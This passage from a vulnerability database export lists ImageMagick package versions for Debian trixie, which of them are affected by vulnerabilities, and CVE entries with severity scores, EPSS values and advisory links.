vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:6.9.12.98%2Bdfsg1-2?distro=trixie
purl	pkg:deb/debian/imagemagick@8:6.9.12.98%2Bdfsg1-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.12.98%252Bdfsg1-2%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2023-2157

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-t38m-c4zf-yqe6

url VCID-tw4r-9r9b-4qez

vulnerability_id VCID-tw4r-9r9b-4qez

summary imagemagick: ImageMagick: heap-buffer overflow

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55005.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55005.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-55005

reference_id

reference_type

scores

value	0.00026
scoring_system	epss
scoring_elements	0.07055
published_at	2026-04-02T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07307
published_at	2026-04-26T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07149
published_at	2026-04-13T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07085
published_at	2026-04-16T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07218
published_at	2026-04-18T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07344
published_at	2026-04-21T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07301
published_at	2026-04-24T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07111
published_at	2026-04-04T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07086
published_at	2026-04-07T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07139
published_at	2026-04-08T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07171
published_at	2026-04-09T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07168
published_at	2026-04-11T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07157
published_at	2026-04-12T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-55005

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111102
reference_id	1111102
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111102

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2388245
reference_id	2388245
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2388245

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v393-38qx-v8fp

reference_id

GHSA-v393-38qx-v8fp

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-13T14:34:20Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v393-38qx-v8fp

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u2?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u2%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.1%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.1%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.1%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2025-55005

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tw4r-9r9b-4qez

url VCID-u45q-eheh-6kak

vulnerability_id VCID-u45q-eheh-6kak

summary ImageMagick: Incorrect Calculation of Buffer Size in ImageMagick's Multispectral MIFF Processing

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-46393.json

reference_id

reference_type

scores

value	2.9
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-46393.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-46393

reference_id

reference_type

scores

value	0.00232
scoring_system	epss
scoring_elements	0.46007
published_at	2026-04-02T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.45995
published_at	2026-04-26T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46024
published_at	2026-04-12T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46032
published_at	2026-04-13T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46087
published_at	2026-04-16T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46083
published_at	2026-04-18T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.45985
published_at	2026-04-24T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46028
published_at	2026-04-21T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.45975
published_at	2026-04-07T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46031
published_at	2026-04-08T12:55:00Z

value	0.00232
scoring_system	epss
scoring_elements	0.46052
published_at	2026-04-11T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-46393

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2361888
reference_id	2361888
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2361888

reference_url

https://github.com/ImageMagick/ImageMagick/commit/81ac8a0d2eb21739842ed18c48c7646b7eef65b8

reference_id

81ac8a0d2eb21739842ed18c48c7646b7eef65b8

reference_type

scores

value	2.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T15:17:12Z/

url

https://github.com/ImageMagick/ImageMagick/commit/81ac8a0d2eb21739842ed18c48c7646b7eef65b8

reference_url

https://github.com/ImageMagick/Website/blob/main/ChangeLog.md#711-44---2025-02-22

reference_id

ChangeLog.md#711-44---2025-02-22

reference_type

scores

value	2.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T15:17:12Z/

url

https://github.com/ImageMagick/Website/blob/main/ChangeLog.md#711-44---2025-02-22

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.46%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.46%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.46%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2025-46393

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u45q-eheh-6kak

url VCID-ujad-kteu-sfdu

vulnerability_id VCID-ujad-kteu-sfdu

summary ImageMagick: stack overflow in coders/tiff.c while parsing malicious tiff file

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-3195.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-3195.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2023-3195

reference_id

reference_type

scores

value	0.00025
scoring_system	epss
scoring_elements	0.06926
published_at	2026-04-07T12:55:00Z

value	0.00025
scoring_system	epss
scoring_elements	0.06891
published_at	2026-04-02T12:55:00Z

value	0.00025
scoring_system	epss
scoring_elements	0.06941
published_at	2026-04-04T12:55:00Z

value	0.00025
scoring_system	epss
scoring_elements	0.06981
published_at	2026-04-08T12:55:00Z

value	0.00025
scoring_system	epss
scoring_elements	0.07012
published_at	2026-04-09T12:55:00Z

value	0.00025
scoring_system	epss
scoring_elements	0.07016
published_at	2026-04-11T12:55:00Z

value	0.00031
scoring_system	epss
scoring_elements	0.09041
published_at	2026-04-12T12:55:00Z

value	0.00031
scoring_system	epss
scoring_elements	0.0892
published_at	2026-04-16T12:55:00Z

value	0.00031
scoring_system	epss
scoring_elements	0.08901
published_at	2026-04-18T12:55:00Z

value	0.00031
scoring_system	epss
scoring_elements	0.09027
published_at	2026-04-13T12:55:00Z

value	0.00031
scoring_system	epss
scoring_elements	0.09052
published_at	2026-04-21T12:55:00Z

value	0.00031
scoring_system	epss
scoring_elements	0.09096
published_at	2026-04-24T12:55:00Z

value	0.00031
scoring_system	epss
scoring_elements	0.09043
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2023-3195

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

url

